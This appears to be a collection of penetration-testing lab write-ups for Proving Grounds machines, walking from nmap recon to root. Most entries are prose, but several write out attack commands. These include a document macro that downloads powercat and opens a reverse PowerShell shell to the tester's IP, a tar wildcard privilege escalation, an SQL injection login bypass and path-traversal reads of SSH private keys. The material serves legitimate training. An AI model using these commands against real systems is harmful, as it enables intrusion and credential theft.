MAXSEC

PG-ClamAV

Maxim Andrei Koltypin — Thu, 02 Jan 2025 00:00:00 GMT

Scope:
192.168.115.42

Recon

Nmap

sudo nmap -sC -sV -oN nmap  192.168.115.42 -T5 -vvvv --min-rate=5000 -sT

PORT    STATE SERVICE     REASON  VERSION                                        22/tcp  open  ssh         syn-ack OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
25/tcp  open  smtp        syn-ack Sendmail 8.13.4/8.13.4/Debian-3sarge3     
80/tcp  open  http        syn-ack Apache httpd 1.3.33 ((Debian GNU/Linux))
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Ph33r
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open  smux        syn-ack Linux SNMP multiplexer
445/tcp open  netbios-ssn syn-ack Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

I went ahead and ran a searchsploit search for all the versions, and did find one that seemed interesting for the Apache server:

I'll note it for now but enumerate further.

I reran the nmap scan with all ports and found an unusual high number port:

60000/tcp open  ssh         syn-ack OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)

So for now we have a SMB server and an Apache webserver. I'll check port 80 first.

Initial Foothold

80/TCP - HTTP

Going to the site I found nothing of interest:

I checked the page source as well, but didn't find anything.

I converted the binary to text:

Understood, time to pwn it then.

199/TCP - SNMP

I went ahead and enumerated this port using snmp-check:

Scrolling a bit down I found this:

it's the ClamAV antivirus that is also conveniently the name of the box.

I looked it up to see if there's a PoC for it.

There appears to be a RCE PoC available. Let's try it out.

proof.txt

Afterwards we can just continue to port 31337:

PG-BullyBox

Maxim Andrei Koltypin — Fri, 03 Jan 2025 00:00:00 GMT

Scope:
192.168.196.27

Recon

Nmap

sudo nmap -sC -sV -oN nmap bully -T5 -vvvv --min-rate=5000 -sT -p-

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBYESg2KmNLhFh1KJaN2UFCVAEv6MWr58pqp2fIpCSBEK2wDJ5ap2XVBVGLk9Po4eKBbqTo96yttfVUvXWXoN3M=
|   256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBdIs4PWZ8yY2OQ6Jlk84Ihd5+15Nb3l0qvpf1ls3wfa
80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

It appears this box only has 2 open ports. Let's start with enumerating port 80.

:::note In the meantime I will run gobuster in order to enumerate sub directories. :::

Gobuster

gobuster dir -u http://bullybox.local -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x txt,pdf,config

This gave a huge output of a bunch of numbers endpoints, but I did find one that could help my further search:

I reran gobuster again using a different list:

Found something!

We'll first enumerate the website, then perhaps come back to this.

80/TCP - HTTP

Here I registered for an account and logged in:

From the page source we find the HIGHLY LIKELY version of BoxBilling running:

Looking up this version online yields the following:

Unfortunately we do not have admin access yet. I checked how to acquire it:

We've now found the admin log in area.

Whenever I enter some sort of creds I get this popup:

I went and inspected the POST request using burp.

git-dumper

We still really need the admin creds to modify the request.

Let's check out that .git directory again using a tool called git-dumper.

pipx install git-dumper

This resulted in an absolute massive output.

Here I found the config file at the top which was LIKELY to contain a password in this case:

Awesome, we got the admin creds. Let's move forwards

admin
Playing-Unstylish7-Provided

Now we still need the email in order to log in.

We have succesfully logged in as admin.

RCE

To make our life easier there's a ready-made GitHub PoC available for us:

:::warning The script failed on me at the start because of some dependency issues but was solved by using sudo apt install python3-pwntools. :::

We then make sure the last modifications are done:

Nice we got our shell, time to get the flag:

Well shit. Let's do some enumeration.

Oh well that saves some time.

proof.txt

Ez pz.

PG-Boolean

Maxim Andrei Koltypin — Sat, 04 Jan 2025 00:00:00 GMT

Scope:
192.168.188.231

Recon

Nmap

sudo nmap -sC -sV -oN nmap 192.168.188.231 -T5 -vvvv --min-rate=5000 -sT -p-

PORT      STATE  SERVICE REASON       VERSION
22/tcp    open   ssh     syn-ack      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp    open   http    syn-ack
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     HTTP/1.1 400 Bad Request
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Content-Type: text/html; charset=UTF-8
|_    Content-Length: 0
3000/tcp  closed ppp     conn-refused
33017/tcp open   http    syn-ack      Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Development
|_http-server-header: Apache/2.4.38 (Debian)

That's weird, we get 3 ports of which 3000 seems to be closed but still shown, and 80 is open but has a 403 code. I decided to check it using curl:

However port 33017 gave us some other output:

It seems this port is still in development, could be a potential attack vector. We'll note it down for now.

Gobuster

Let's do some directory enumeration.

We get some filemanager* pages, including a .config file which could be potentially interesting. Problem is that we need login creds in order to access it.

Funnily enough when we check the page source we notice something interesting:

I registered for an account using fake creds but couldn't get access.

I then checked the other port:

This yet again showed us a bunch of interesting extensions but we couldn't access them:

Initial Foothold

80/TCP - HTTP

Using WappAlyzer I found out that the webpage was using Ruby on Rails.

Since the exact version was not known nor found I had to do some digging.

I booted up burpsuite and analyzed the POST request.

:::note It turns out that when a user creates an account, they need to verify the email first. Via burp I found out that the response told the server whether the confirmed state was either true or false, e.g. a Boolean value. :::

We needed to zoom in on this part:

This response meant that we could manipulate our request by adding the confirmed=true value.

Let's test it out.

# Change ONLY the following parameter
user%5Bemail%5D=test1%40gmail.com

# Into
user%5Bconfirmed%5D=True

By modifying the request we were able to verify our email address and account, now let's login.

Upon refreshing the page we got a new dashboard:

I tested the upload function to better understand it:

I then right clicked the file to check where it was uploaded:

This is the link that would execute every time I tried to download the file again.

Let's try something out.

We were able to get the /etc/passwd file.

:::note We were able to get the /etc/passwd file by exploiting a Directory Traversal vulnerability. :::

Inside the /etc/passwd we found the following user:

Let's try to insert a ssh key in their .ssh directory in order to simplify logging in to their system.

SSH Keygen

To drop our ssh key in there we can follow this guide:

We have successfully copied it over, let's log in now.

local.txt

Privilege Escalation

I noticed the boolean directory in remi's /home directory. I went in and started snooping around, after some searching I found the following:

We could try and log into MySQL and check for some interesting stuff.

Nothing interesting came up.

:::note I got a bit stuck then realized that the root key was inside remi's /.ssh/keys directory, meaning I could just log in using that key. :::

:::warning Using normal ssh -i root root@127.0.0.1 kept resulting in an error so this was the only way to get it working. :::

PG-Blackgate

Maxim Andrei Koltypin — Wed, 08 Jan 2025 00:00:00 GMT

Scope:
192.168.247.176

Recon

Nmap

sudo nmap -sC -sT -sV -oN nmap 192.168.247.176 -p- -T5 -vvvv --min-rate=5000

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
6379/tcp open  redis   syn-ack Redis key-value store 4.0.14
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

It appears there's only 2 services running of which we're probably only able to test 6379 right away.

It seems to be running on version 4.0.14.

It seems that this exploitation can be done manually but also using metasploit:

We'll first try do some directory enumeration.

Feroxbuster

This didn't give us anything:

Initial Foothold

6379/TCP - Redis

I did some more digging since the GitHub page I first listed won't be useful, the payload that the person used is no longer available.

We'll have to find an alternative.

Luckily hacktricks comes to save the day yet again:

Let's try it from the easiest solution to the furthest.

nc -vn 192.168.247.176 6379

info

Since we can't do much from here we should get RCE asap.

And we got our shell.

local.txt

Privilege Escalation

I then started to check on how to escalate my privileges when I found the following noteworthy:

It turns out this so called protected mode is turned off, and we can run /usr/local/bin/redis-status as root.

:::note I went ahead and gave myself an .ssh shell to get a stable environment. :::

I looked up what we could do with the protected mode off but didn't really find anything. Guess it's time to transfer over linpeas.

First thing I found was the OS version.

Then I found a PoC called PwnKit with a link to it, let's check it out.

We just had to go ahead and download over the binary and then execute it.

proof.txt

PG-Clue

Maxim Andrei Koltypin — Wed, 22 Jan 2025 00:00:00 GMT

Scope:
192.168.192.240

Recon

Nmap

sudo nmap -sC -sV -vvvv --min-rate=5000 -sT -T5 -p- 192.168.192.240

PORT     STATE  SERVICE          REASON       VERSION
22/tcp   open   ssh              syn-ack      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open   http             syn-ack      Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-title: 403 Forbidden
139/tcp  closed netbios-ssn      conn-refused
445/tcp  closed microsoft-ds     conn-refused
3000/tcp open   http             syn-ack      Thin httpd
|_http-favicon: Unknown favicon MD5: 68089FD7828CD453456756FE6E7C4FD8
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: thin
|_http-title: Cassandra Web
8021/tcp open   freeswitch-event syn-ack      FreeSWITCH mod_event_socket
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 80 gives error 403:

port 3000 however is more successful:

No idea what it does yet, but it's open and mentions something like Cassandra Web.

feroxbuster didn't get me anywhere either.

Luckily I've found exploits for both ports, downside is, I don't know what versions are running so I cannot be certain.

Remote File Read

I tried out the latter and surprisingly it worked right away!

Since it worked I moved on to the second part of the PoC:

cassie
SecondBiteTheApple330

Hell yeah, we got creds for cassie.

Unfortunately we find unable to log in as cassie, so let's continue onto the other PoC found.

This failed as well (eventhough the exploit itself did not!)

Let's check out SMB.

445/TCP - SMB

Thus I connected to \backup via smbclient:

After a while of fiddling around I found a zipped file called changelog which contained the version:

However after a while of searching this didn't yield shite either.

Foothold

According to this article the password should be stored in the following place:

So I used the previous exploit again to read the file:

StrongClueConEight021

Now all that was left was to modify the other PoC so it will use this password:

Hell yeah, let's get a shell!

Shell

local.txt

Lateral Movement

Awesome, we're now logged in as cassie at last. Let's enumerate the system.

Let's check what we can do with this binary:

Perhaps we can run it using sudo which might then give us more stuff.

Now using another terminal we could use curl try out the file read again.

Hell yeah it worked! Let's try some other files.

Even better! We've got root's hash, let's crack it!

:::fail Since cracking the hash took too long I resulted to other measures. :::

I instead went ahead and read anthony's .bash_history where I found the following:

Holy shit this means that we can get root access through anthony's auth keys!

Privilege Escalation

Foothold

curl --path-as-is localhost:4444/../../../../../../../../home/anthony/.ssh/id_rsa > id_rsa

proof.txt

Alternative Exploitation

Since there already is a id_rsa in cassie's home directory from the start, we can just use that one to log into root.

PG-Bratarina

Maxim Andrei Koltypin — Fri, 31 Jan 2025 00:00:00 GMT

Scope:
192.168.140.71

Recon

Nmap

sudo nmap -sC -sV -vvvv -Pn -p- bratarina -sT --min-rate=5000 -T5

PORT    STATE  SERVICE     REASON       VERSION
22/tcp  open   ssh         syn-ack      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp  open   smtp        syn-ack      OpenSMTPD
| smtp-commands: bratarina Hello bratarina [192.168.45.239], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
53/tcp  closed domain      conn-refused
80/tcp  open   http        syn-ack      nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title:         Page not found - FlaskBB        
445/tcp open   netbios-ssn syn-ack      Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: bratarina
|   NetBIOS computer name: BRATARINA\x00
|   Domain name: \x00
|   FQDN: bratarina
|_  System time: 2025-01-31T04:03:43-05:00
| smb2-time: 
|   date: 2025-01-31T09:03:42
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Right away I noticed SMB open and nmap could fingerprint it, so I went ahead and ran some smb specific tools.

Enum4Linux

Here I found the following:

Accordingly I used smbclient to log in anonymously

SMBclient

I then downloaded the file and inspected it.

We could use this file to add our own user to it, then upload this file to the target and login with our own user.

Let's copy the root user and add our own name.

Modifying passwd file

Now we need to find a way to upload this file. Port 80 was a bust and wouldn't do, so we probably need to use port 25 SMTP for it.

25/TCP - SMTP

It seemed to work, let's see if it did the trick.

Foothold

:::note I modified the name to mk instead of kali. :::

proof.txt

PG-Cockpit

Maxim Andrei Koltypin — Fri, 31 Jan 2025 00:00:00 GMT

Scope:
192.168.134.10

Recon

Nmap

sudo nmap -sC -sV -vvvv --min-rate=5000 -sT -T5 -p- 192.168.134.10  -Pn

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: blaze
9090/tcp open  http    syn-ack Cockpit web service 198 - 220
|_http-title: Did not follow redirect to https://192.168.134.10:9090/
| http-methods: 
|_  Supported Methods: GET HEAD

Feroxbuster

Port 80 gives the following output.

port 9090 however gave an immense output.

:::important Since I got stuck here I went ahead and ran gobuster for good measure to try and see if I missed something. :::

Gobuster

Feroxbuster completely missed this! Let's check it out.

80/TCP - HTTP

I tried to enter admin - admin and got this red colored response:

Perhaps SQLi?

Yup, let's do some SQLi testing.

:::note It looks like we're dealing with a MySQL server. I will be referencing the following site :::

After some tries I get the following:

Not to worry as the site still works.

SQLi

I fire up burp to start testing the injections:

Let's start modifying it.

'OR '' = '

:::note Found it in this resource: :::

code 302, seems good, let's try it out.

Awesome

james 
canttouchhhthiss@455152

cameron
thisscanttbetouchedd@455152

Returning back to port 9090 I was able to log in using james's creds.

9090/TCP - HTTP

Using james creds I got in:

In the Host > Accounts > james section I found a spot where I could upload Authorized Public SSH Keys so I copy pasted my id_rsa.pub file into it.

Foothold

Let's try to log in via SSH.

local.txt

Enumeration

We find the tar * wildcard again. From [[OSCP C#Tar Wildcard]] we learned how to do it, so we will try and abuse it in the same way.

Privilege Escalation

Using the wildcard trick we get a root shell easily.

touch ./--checkpoint=1
touch ./--checkpoint-action=exec=sh 
sudo tar -czvf /tmp/backup.tar.gz *

proof.txt

PG-Fanatastic

Maxim Andrei Koltypin — Sat, 01 Feb 2025 00:00:00 GMT

Scope:
192.168.140.181

Recon

Nmap

sudo nmap -sC -sV -vvvv -Pn -p- 192.168.140.181 -sT --min-rate=5000 -T5

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
3000/tcp open  http    syn-ack Grafana http
| http-robots.txt: 1 disallowed entry 
|_/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: F69DADBD5936359AF76AAB84559E849F
| http-title: Grafana
|_Requested resource was /login
|_http-trane-info: Problem with XML parsing of /evox/about
9090/tcp open  http    syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-title: Prometheus Time Series Collection and Processing Server
|_Requested resource was /graph
| http-methods: 
|_  Supported Methods: GET OPTIONS
|_http-favicon: Unknown favicon MD5: 5EE43B38986A144D6B5022EA8C8F748F
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I noticed the Grafana service running on port 3000 so looked up available PoC's for it:

Let's see if it works:

It does!!

SQLite3

From these tables this one seemed most interesting:

SELECT * FROM data_source;
[{"id":1,"org_id":1,"version":1,"type":"prometheus","name":"Prometheus","access":"server","url":"http://localhost:9090","password":"","user":"","database":"","basic_auth":0,"basic_auth_user":"sysadmin","basic_auth_password":"","is_default":0,"json_data":"{}","created":"2022-02-04 09:19:59","updated":"2022-02-04 09:19:59","with_credentials":0,"secure_json_data":"{\"basicAuthPassword\":\"anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==\"}","read_only":0,"uid":"HkdQ8Ganz"}]

Note the basicAuthPassword here, let's write it down.

anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==

Proof of Concept

We can now utilize the following PoC:

We just need to change this part with our own password.

Troubleshooting

Once we try to run it we get this error that we need to solve:

To get this properly working we need to use the following commands:

# Enable Go modules
export GO111MODULE=on

# Initiliaze Go module in project directory
go mod init Fanatastic

# Verify dependencies
go mod tidy

# Get required package
go get golang.org/x/crypto/pbkdf2

And afterwards we can run our PoC:

sysadmin
SuperSecureP@ssw0rd

We can now log into SSH.

Foothold

I then upgrade the shell using script -c bash /dev/null.

local.txt

Privilege Escalation

We can't run sudo -l, let's check binaries.

Upon downloading over and running linpeas I found this:

I looked it up on Google:

Following the article we check what partition the / directory is mounted on.

Then using debugfs /dev/sda2 we go ahead and read the contents of root's /.ssh/id_rsa file.

debugfs /dev/sda2
mkdir test
cat /root/.ssh/id_rsa

Now we copy the contents on our Kali, use chmod 600 and log into ssh as root.

Awesome, let's get the flag.

proof.txt

Finished 11:25 01-02-2025

[^Links]: [[OSCP Prep]]

PG-Authby

Maxim Andrei Koltypin — Fri, 21 Feb 2025 00:00:00 GMT

Scope:
192.168.198.46

Recon

Nmap

sudo nmap -sT authby -sV -sC -vvvv -T5 -p- -T5 --min-rate=5000

PORT     STATE SERVICE       REASON  VERSION
21/tcp   open  ftp           syn-ack zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 Feb 21 18:23 log
| ----------   1 root     root         2275 Aug 09  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Aug 03  2024 accounts
242/tcp  open  http          syn-ack Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
3145/tcp open  zftp-admin    syn-ack zFTPServer admin
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Service
|_ssl-date: 2025-02-21T10:24:30+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

21/TCP - FTP

There's a boatload of files here, but I can't transfer them since they're owned by root:

Luckily for us it seems that all we have to do is omit the -a option and try logging in with default creds.

I first tried the other port to no avail

And then I tried 21 again

We get in using default admin - admin creds!

The directory looks a whole lot different now as well.

Let's check them out.

:::info Little side note: :::

Hashcat

Let's go ahead and crack it.

242/TCP - HTTP

I then checked whether the creds could be the ones for RDP but it seems they're invalid:

However we can try Remote File Upload via FTP!

Since we have access as admin on FTP we can easily upload any sort of file. Let's see if this reflects on the website.

Awesome, this proves that the FTP server is indeed the docroot, let's go ahead and make a webshell payload that we will put onto the FTP server.

Let's check out what else we can do:

Hell yeah, let's upload one of the potatoes to the docroot, and execute it to get ourselves a SYSTEM shell right away.

Unfortunately this did not seem to work.

I decided to ping my own IP to see whether there was an issue of some sorts

This seemed to work however.

Foothold

I then proceeded to simply initiate a reverse shell via the nc.exe binary I'd uploaded.

:::warning Well this explains why the powershell reverse shell wouldn't kick in. :::

local.txt

Privilege Escalation

Abusing privileges

I guess this won't fire since we have the 64-bit version.

Well this wouldn't work either, what now?

Looks like none of the other potatoes worked either, let's do some more enumeration.

Enum

It appears to be a clean install of Windows Server 2008, there MUST be some exploits for it.

Perfect, let's check out the PoC

Alrighty then, pretty straightforward. Let's compile it.

We transfer it over and instantly become SYSTEM

proof.txt

PG-Algernon

Maxim Andrei Koltypin — Fri, 21 Feb 2025 00:00:00 GMT

Scope:
192.168.198.65

Recon

Nmap

sudo nmap -sT algernon -sV -sC -vvvv -T5 -p- -T5 --min-rate=5000

PORT      STATE    SERVICE       REASON      VERSION
21/tcp    open     ftp           syn-ack     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20  09:31PM       <DIR>          ImapRetrieval
| 02-21-25  01:39AM       <DIR>          Logs
| 04-29-20  09:31PM       <DIR>          PopRetrieval
|_02-21-25  01:39AM       <DIR>          Spool
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open     http          syn-ack     Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp   open     msrpc         syn-ack     Microsoft Windows RPC
139/tcp   open     netbios-ssn   syn-ack     Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds? syn-ack
5040/tcp  open     unknown       syn-ack
9998/tcp  open     http          syn-ack     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 9D7294CAAB5C2DF4CD916F53653714D5
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Fri, 21 Feb 2025 09:43:48 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
|_http-server-header: Microsoft-IIS/10.0
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
17001/tcp open     remoting      syn-ack     MS .NET Remoting services
49664/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49665/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49666/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49667/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49668/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49669/tcp open     msrpc         syn-ack     Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 55999/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 7682/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 62932/udp): CLEAN (Timeout)
|   Check 4 (port 16225/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-02-21T09:43:50
|_  start_date: N/A

21/TCP - FTP

Right away I started off with port 21 before the nmap scan was even done:

In here I found the following in the Logs tab:

Looks like we're dealing with a ClamAV antivirus?

I then unzipped everything and went on to check out the files:

None of it really seems interesting.

445/TCP - SMB

80/TCP - HTTP

Didn't seem promising, moving on

9998/TCP - HTTP

I observed the request in burpsuite:

This didn't really tell me anything, so I went and checked the source code:

This seems to be the version number, let's look up any exploits matching this number:

Just what we need, let's modify the PoC.

PoC modifying

There was a super long base64 encrypted payload here so I decrypted it for good measure:

Don't see anything malicious, let's get to it.

:::note Keep in mind that the RHOST port of 17001 is already set correctly, as per our nmap scan. :::

Let's save and run it.

Foothold

Surprisingly easy! Worked right away.

proof.txt

PG-Craft

Maxim Andrei Koltypin — Fri, 21 Feb 2025 00:00:00 GMT

Scope:
192.168.198.169

Recon

Nmap

sudo nmap -sT craft -sV -sC -vvvv -T5 -p- -T5 --min-rate=5000 -Pn

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: Craft
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA

Well that is unusual. Let's run a UDP scan as well for good measure.

sudo nmap -sU craft -p 161 -Pn -sC -sV

Host is up.

PORT    STATE         SERVICE VERSION
161/udp open|filtered snmp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.51 seconds

This is even more vague.

80/TCP - HTTP

I submitted a sample test.txt file:

Right, let's run feroxbuster first to find more juicy info first.

Seems like the intention here is for us to craft up an .odt file with a macro in it. In that case it would be a phishing scenario, where a simulated victim will click on the file, causing the macro to fire and give us a reverse shell.

Macro crafting

I installed LibreOffice using the following commands

sudo apt -y update
sudo apt -y install libreoffice libreoffice-gtk4

I now had access to the whole suite of office tools:

Let's fire up Writer which is the same as Microsoft Word.

We can then find the Macros tab here:

We want to create a Basic Macro. Click on New and call it whatever.

We will now want to insert our reverse shell payload, since it's a Windows target we'll have to use powershell.

Save the Macro by clicking Ctrl + s.

Now we close the Macro window and need to initialize the Macro on our .odt file on opening.

:::warning Don't forget to write even the smallest sample text inside the file, or you will get thrown an error on upload. :::

Inserting Payload

We will now go ahead and upload the .odt file to the website, then trigger it from the /uploads endpoint. Thus we need to ready our listener.

:::fail Unfortunately the reverse shell didn't fire, let's modify it and try another payload. :::

Revisiting Macro

I will modify the macro like so:

cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.207/powercat.ps1');powercat -c 192.168.45.207 -p 443 -e powershell

With this premise we will upload powercat.ps1 to the webserver, which will then serve us a reverse shell.

Let's upload the file again.

Foothold

After a short while the shell fires:

:::note We have successfully phished our way into the target! :::

Let's grab the local.txt flag then do some enumerating:

local.txt

Enumerating Target

I start by checking privileges, nothing notable.

I used tree /F on our user's home directory, and he has an absolute boatload of files.

I went ahead and transferred winpeas because I am lazy:

We found valid creds, perhaps we can log in via RDP later.

Scratch that, winrm is exposed instead, that is still a viable way to get a persistent shell.

Hashcat

I decided to crack the hash so I could log in via winrm in case I had to reboot the target.

It seems the hash is uncrackable, yet we can still use it in a pass the hash scenario using evil-winrm.

Lateral Movement

During the rest of the enumeration we find the following directory C:\xampp\htdocs which is the website docroot.

It seems like apache has full control over it, since they're HIGHLY LIKELY a service account, that means they must have the SeImpersonatePrivilege enabled which is standard for web service accounts.

This tells us that we need to pivot to this user in order to further escalate our privileges.

I thus went on to craft up a standard php webshell and uploaded it to the webroot, then accessed it from the website:

Hell yeah it worked!

As expected, the service account indeed has the correct privileges to get SYSTEM.

Let's set up another reverse shell.

Reverse Shell

I transferred the necessary tooling for my next steps.

And then created a new reverse shell.

:::note We have successfully gotten a reverse shell as apache. :::

Privilege Escalation

Now all that's left is to abuse the privileges.

proof.txt

Overall neat way of getting access, the phishing part was quite easy and I had no problems whatsoever. Important to get the methodology down afterwards for the priv-esc:

Found apache service account?

Check web root with icacls

Upload webshell/reverse shell

Move laterally.

PG-DVR4

Maxim Andrei Koltypin — Mon, 24 Feb 2025 00:00:00 GMT

Scope:
192.168.219.179

Recon

Nmap

sudo nmap -sC -sV -vvvv -p- dvr4 -sT -T5 --min-rate=5000

